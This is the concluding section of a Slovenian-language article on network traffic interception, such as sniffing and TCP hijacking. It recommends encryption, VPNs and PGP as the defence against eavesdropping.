Zaključek

Prestrezanje omrežnih podatkov je najučinkovitejša metoda vdora v omrežje, ki hekerju omogoča, da pridobi skoraj vse informacije, ki krožijo po omrežju. Največji praktični razvoj so dosegla orodja za vohanje, tj. poslušanje omrežij; Ne moremo pa mimo metod prestrezanja omrežnih podatkov, ki se izvajajo z motnjami v normalnem delovanju omrežja z namenom preusmeritve prometa na hekerskega gostitelja, predvsem metod prestrezanja TCP povezav. Vendar v praksi zadnje omenjene metode še niso dovolj razvite in jih je treba izboljšati.

Antiheker bi moral vedeti, da je edina rešitev pred prestrezanjem podatkov njihovo šifriranje, tj. metode kriptografske zaščite. Ko pošiljate sporočilo po omrežju, morate vnaprej domnevati, da je kabelski sistem omrežja popolnoma ranljiv in da bo vsak heker, povezan z omrežjem, lahko ujel vsa poslana tajna sporočila iz njega. Obstajata dve tehnologiji za rešitev te težave - ustvarjanje omrežja VPN in šifriranje samih sporočil. Vse te naloge je zelo enostavno rešiti s programskim paketom PGP Desktop Security (njegov opis najdete npr. v).

Priljubljeno v kategoriji: